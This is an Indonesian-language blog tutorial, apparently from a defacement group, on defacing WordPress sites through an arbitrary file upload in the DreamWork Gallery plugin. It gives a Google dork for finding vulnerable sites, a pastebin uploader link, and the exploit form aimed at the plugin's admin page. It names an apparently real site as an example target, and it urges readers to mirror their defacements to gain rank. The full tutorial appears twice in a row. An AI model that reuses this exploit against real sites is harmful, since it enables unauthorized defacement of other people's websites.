CMS wordpress
TUTORIAL DEFACE POC CMS WORDPRESS DREAMWORK
============================
special thanks for all admin n member :
Indonesia Security Lite
Security Cyber Lite
and
http://www.maniak-wifi.web.id/2017/04/deface-cms-wordpress-metode-exploit-dreamwork-gallery.html?m=1
============================
selamat malam gais okeh kini admin akan memberikan tutor tentang depes again, jangan lupa yaa miror :v
agar naik rank ISL dan buar teman2 Security Cyber Lite jangan bosan untuk miror agar bisa diculik ke ISL pusat :), oke cek idot
(tutor nya agak rumit maaf)
tujuan :
deface web poc wordpress cms dream worker
persiapan alat
- koneksi internet
- dork
- upload.html
- kopi dan pisang goreng yuk sri :v
oke ini dork nya
dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
buat uploader nya ini :
link nya : https://pastebin.com/raw/yivBmBuE
okeh langkah kerja
1. dorking di gugel spt biasa dan pilih website yang ente suka
2. stlah dipilih jika web tsb vuln maka akn muncul kaya sc html gtu gan
3. buat upload nya di luar folder ya
cara buat nya
- open link uploader td
- copass all sc nya
lalu buka termux
- apt install micro
- cd /sdcard
- micro upload.html
- ctrl + s
oke tahan dulu gan janga di close
4. jika sudah terlihat target kalian memuncul kan sc , maka lihat di alamat website nya ambil alamat nya https://www.targetlu.com/
for example
http://salonbluehair.com/
nah kalo udh dapet spt itu
copas
lalu masuk termux again
edit sc di micro td
edit di bagian
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
ganti http://www.site.com/ jdi target agan maka akan sprt cntoh
<form action="http://salonbluehair.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
jika sudah ctrl + s
panggil sc upload lu di chrome
dgn cara
///emulated/storage/0/upload.html
jika sudah dan muncul kotak utuk upload
klik pilih file sc lu html
dan submit(yaa kayak upload file biasa sih)
jika sudah
maka akan muncul
bla bla bla kaya notif warning gtu
cari yang seperti ini
/wp-content/uploads/dreamwork/8389_uploadfolder/big/AQ123.html
biasanya itu dibawah sndri bro
copAS di blakang web yang lu depes td
blakang nya hapus smua kcuali alamay web nya lalu copas di blakang nya
kaya gini ni
http://salonbluehair.com/wp-content/uploads/dreamwork/8389_uploadfolder/big/AQ123.html
nahh jadi deh , hehe
selamat mencoba
untuk lebih jelas nya
mampir kesini nih
http://www.maniak-wifi.web.id/2017/04/deface-cms-wordpress-metode-exploit-dreamwork-gallery.html?m=1
okeh sekian
============================
special thanks for all admin n member :
Indonesia Security Lite
Security Cyber Lite
and
http://www.maniak-wifi.web.id/2017/04/deface-cms-wordpress-metode-exploit-dreamwork-gallery.html?m=1
============================
selamat malam gais okeh kini admin akan memberikan tutor tentang depes again, jangan lupa yaa miror :v
agar naik rank ISL dan buar teman2 Security Cyber Lite jangan bosan untuk miror agar bisa diculik ke ISL pusat :), oke cek idot
(tutor nya agak rumit maaf)
tujuan :
deface web poc wordpress cms dream worker
persiapan alat
- koneksi internet
- dork
- upload.html
- kopi dan pisang goreng yuk sri :v
oke ini dork nya
dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
buat uploader nya ini :
link nya : https://pastebin.com/raw/yivBmBuE
okeh langkah kerja
1. dorking di gugel spt biasa dan pilih website yang ente suka
2. stlah dipilih jika web tsb vuln maka akn muncul kaya sc html gtu gan
3. buat upload nya di luar folder ya
cara buat nya
- open link uploader td
- copass all sc nya
lalu buka termux
- apt install micro
- cd /sdcard
- micro upload.html
- ctrl + s
oke tahan dulu gan janga di close
4. jika sudah terlihat target kalian memuncul kan sc , maka lihat di alamat website nya ambil alamat nya https://www.targetlu.com/
for example
http://salonbluehair.com/
nah kalo udh dapet spt itu
copas
lalu masuk termux again
edit sc di micro td
edit di bagian
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
ganti http://www.site.com/ jdi target agan maka akan sprt cntoh
<form action="http://salonbluehair.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
jika sudah ctrl + s
panggil sc upload lu di chrome
dgn cara
///emulated/storage/0/upload.html
jika sudah dan muncul kotak utuk upload
klik pilih file sc lu html
dan submit(yaa kayak upload file biasa sih)
jika sudah
maka akan muncul
bla bla bla kaya notif warning gtu
cari yang seperti ini
/wp-content/uploads/dreamwork/8389_uploadfolder/big/AQ123.html
biasanya itu dibawah sndri bro
copAS di blakang web yang lu depes td
blakang nya hapus smua kcuali alamay web nya lalu copas di blakang nya
kaya gini ni
http://salonbluehair.com/wp-content/uploads/dreamwork/8389_uploadfolder/big/AQ123.html
nahh jadi deh , hehe
selamat mencoba
untuk lebih jelas nya
mampir kesini nih
http://www.maniak-wifi.web.id/2017/04/deface-cms-wordpress-metode-exploit-dreamwork-gallery.html?m=1
okeh sekian
Komentar
Posting Komentar